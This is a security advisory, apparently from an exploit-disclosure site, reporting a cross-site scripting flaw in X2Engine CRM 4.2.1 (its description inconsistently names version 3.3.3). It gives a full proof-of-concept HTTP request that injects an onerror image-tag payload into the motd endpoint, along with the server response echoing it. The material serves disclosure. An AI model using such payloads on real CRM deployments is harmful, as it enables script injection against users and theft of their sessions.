X2Engine CRM 4.2.1 Cross Site Scripting

2014.09.25
Credit: JoeV
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#Affected Vendor: http://www.x2engine.com/ #Date: 24/09/2014 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version : 4.2.1 #Description: X2Engine CRM v 3.3.3 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- POST /index-test.php/site/motd HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 63 Accept: */* Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/index-test.php/profile/1 Accept-Encoding: gzip,deflate Accept-Language: en-US,en;q=0.8 Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2 message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E HTTP/1.1 200 OK Date: Wed, 24 Sep 2014 14:00:57 GMT Server: Apache/2.4.9 (Win32) PHP/5.5.12 X-Powered-By: PHP/5.5.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 37 Content-Type: text/html "><img src=d onerror=confirm(/xss/);> -- Regards, *Joel V*


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top